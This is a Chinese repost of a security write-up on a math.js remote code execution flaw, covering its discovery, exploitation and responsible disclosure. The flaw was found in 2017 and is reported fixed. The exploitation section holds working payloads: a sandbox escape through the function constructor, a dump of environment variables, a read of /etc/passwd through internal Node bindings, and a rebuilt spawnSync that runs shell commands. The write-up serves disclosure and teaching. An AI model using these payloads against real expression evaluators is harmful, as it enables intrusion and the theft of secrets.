利用 math.js 中的远程代码执行漏洞
2023-6-21 08:2:46 Author: Ots安全(查看原文) 阅读量:36 收藏

本文简要介绍了我们如何发现、利用和报告远程代码执行 (RCE) 漏洞。它旨在成为发现漏洞以及以负责任的方式报告漏洞的指南。
第一步:发现
在使用math.js API ( ) 的包装器http://api.mathjs.org/v1/?expr=expression-here时,我们发现它似乎可以评估 JavaScript,但有一些限制:
> !calc cosResult: function
> !calc evalResult: function
> !calc eval("x => x")Error: Value expected (char 3)
> !calc eval("console.log")Error: Undefined symbol console
> !calc eval("return 1")Result: 1
特别是,它似乎eval被替换为安全版本。Function和setTimeout/setInterval也没有用:
> !calc Function("return 1")
Error: Undefined symbol Function

> !calc setTimeout
Error: Undefined symbol Function

第二步:剥削
现在我们发现代码评估存在某种限制,我们必须避开它们。
在 JavaScript 中有四种评估字符串的标准方法:
eval("code")new Function("code")setTimeout("code", timeout)setInterval("code", interval)
在 math.js 环境中,这些无法直接访问,因为它们未定义或因为它们已使用安全函数重新定义。然而,它们可以被间接访问:值得注意的是,它们Function可以作为现有函数的构造函数被间接访问——这是导致发现漏洞的关键直觉。
例如,Function("return 1")可以替换为Math.floor.constructor("return 1"). 因此,要评估return 1,我们可以使用Math.floor.constructor("return 1")()

我们知道在 math.js 环境中cos被定义为一个函数,所以我们使用了:

> !calc cos.constructor("return 1")()Result: 1
成功!
从这里我们可以简单地require-d 一些本机模块并获得对操作系统的访问权限,对吗?没那么快:尽管 math.js API 服务器在 Node.js 环境中运行,但出于某种原因我们无法使用require.
> !calc cos.constructor("return require")()Error: require is not defined

但是,我们可以使用process,它有一些漂亮的功能:

> !calc cos.constructor("return process")()
Result: [object process]

> !calc cos.constructor("return process.env")()
Result: {
"WEB_MEMORY": "512",
"MEMORY_AVAILABLE": "512",
"NEW_RELIC_LOG": "stdout",
"NEW_RELIC_LICENSE_KEY": "<redacted>",
"DYNO": "web.1",
"PAPERTRAIL_API_TOKEN": "<redacted>",
"PATH": "/app/.heroku/node/bin:/app/.heroku/yarn/bin:bin:node_modules/.bin:/usr/local/bin:/usr/bin:/bin:/app/bin:/app/node_modules/.bin",
"WEB_CONCURRENCY": "1",
"PWD": "/app",
"NODE_ENV": "production",
"PS1": "\[\033[01;34m\]\w\[\033[00m\] \[\033[01;32m\]$ \[\033[00m\]",
"SHLVL": "1",
"HOME": "/app",
"PORT": "<redacted>",
"NODE_HOME": "/app/.heroku/node",
"_": "/app/.heroku/node/bin/node"
}

尽管process.env包含一些有趣的信息,但它并不能真正做任何有趣的事情:我们需要更深入地使用process.binding,它向操作系统公开 Javascript 绑定。虽然它们没有正式文档并且仅供内部使用,但可以通过阅读 Node.js 源代码来重建它们的行为。例如,我们可以用来process.binding("fs")读取操作系统上的任意文件(具有适当的权限):
为简洁起见,我们将跳过!calc cos.constructor("code")包装器而是粘贴相关的 JS 代码。
> buffer = Buffer.allocUnsafe(8192); process.binding('fs').read(process.binding('fs').open('/etc/passwd', 0, 0600), buffer, 0, 4096); return bufferroot:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/sh<more users...>
我们几乎完成了:现在我们需要找到一种打开 shell 并运行任意命令的方法。如果您有使用 Node.js 的经验,您可能知道child_process, 它可用于生成进程spawnSync:我们只需要使用 OS 绑定复制此功能(记住我们不能使用require)。
这比看起来更容易:您只需获取的源代码child_process,删除不需要的代码(未使用的函数和错误处理),将其缩小,然后通过 API 运行它。
// Source: https://github.com/nodejs/node/blob/master/lib/child_process.js// Defines spawn_sync and normalizeSpawnArguments (without error handling). These are internal variables.spawn_sync = process.binding('spawn_sync'); normalizeSpawnArguments = function(c,b,a){if(Array.isArray(b)?b=b.slice(0):(a=b,b=[]),a===undefined&&(a={}),a=Object.assign({},a),a.shell){const g=[c].concat(b).join(' ');typeof a.shell==='string'?c=a.shell:c='/bin/sh',b=['-c',g];}typeof a.argv0==='string'?b.unshift(a.argv0):b.unshift(c);var d=a.env||process.env;var e=[];for(var f in d)e.push(f+'='+d[f]);return{file:c,args:b,options:a,envPairs:e};}// Defines spawnSync, the function that will do the actual spawningspawnSync = function(){var d=normalizeSpawnArguments.apply(null,arguments);var a=d.options;var c;if(a.file=d.file,a.args=d.args,a.envPairs=d.envPairs,a.stdio=[{type:'pipe',readable:!0,writable:!1},{type:'pipe',readable:!1,writable:!0},{type:'pipe',readable:!1,writable:!0}],a.input){var g=a.stdio[0]=util._extend({},a.stdio[0]);g.input=a.input;}for(c=0;c<a.stdio.length;c++){var e=a.stdio[c]&&a.stdio[c].input;if(e!=null){var f=a.stdio[c]=util._extend({},a.stdio[c]);isUint8Array(e)?f.input=e:f.input=Buffer.from(e,a.encoding);}}console.log(a);var b=spawn_sync.spawn(a);if(b.output&&a.encoding&&a.encoding!=='buffer')for(c=0;c<b.output.length;c++){if(!b.output[c])continue;b.output[c]=b.output[c].toString(a.encoding);}return b.stdout=b.output&&b.output[1],b.stderr=b.output&&b.output[2],b.error&&(b.error= b.error + 'spawnSync '+d.file,b.error.path=d.file,b.error.spawnargs=d.args.slice(1)),b;}

从这里,我们可以生成任意进程并运行 shell 命令:

> return spawnSync('/usr/bin/whoami');{  "status": 0,  "signal": null,  "output": [null, u15104, ],  "pid": 100,  "stdout": u15104,  "stderr":}
第三步:报告
既然我们发现了一个漏洞并最大程度地利用了它,我们就必须决定如何处理它。由于我们只是为了好玩而没有恶意地利用它,所以我们采取了“白帽”方式并将其报告给维护者。我们通过他的 GitHub 个人资料中列出的电子邮件地址私下联系了他,并提供了以下详细信息:
  • 漏洞的简短描述(mathjs.eval 中的远程代码执行缺陷);
  • 一个示例攻击,解释它是如何工作的(总结为什么cos.constructor("code")()有效以及可以实现什么process.bindings);
  • 实时服务器上的实际演示whoami(我们包括和的输出uname -a);
  • 关于如何修复它的建议(例如,使用vmNode.js 中的模块)。
在两天的时间里,我们与作者一起帮助修复了该漏洞。值得注意的是,在他推出修复后,2f45600我们发现了一个类似的解决方法(如果您不能直接使用构造函数,请使用cos.constructor.apply(null, "code")()),该解决方法已在3c3517d.
时间线
  • 2017 年 3 月 26 日 22:20 CEST:首次成功利用
  • 2017 年 3 月 29 日 14:43 CEST:向作者报告了漏洞
  • 2017 年 3 月 31 日 12:35 CEST:.apply报告了第二个漏洞 ( )
  • 2017 年 3 月 31 日 13:52 CEST:两个漏洞均已修复

原文链接:https://jwlss.pw/mathjs/

感谢您抽出

.

.

来阅读本文

点它,分享点赞在看都在这里


文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjYyMzkwOA==&mid=2247499091&idx=3&sn=6d6adada9a227172e4b65d5baa86d75c&chksm=9badb418acda3d0ec44f1c17ab68338b4cae4e11d6177db09eb8eb66b2b363d37c1a66e88063#rd
如有侵权请联系:admin#unsafe.sh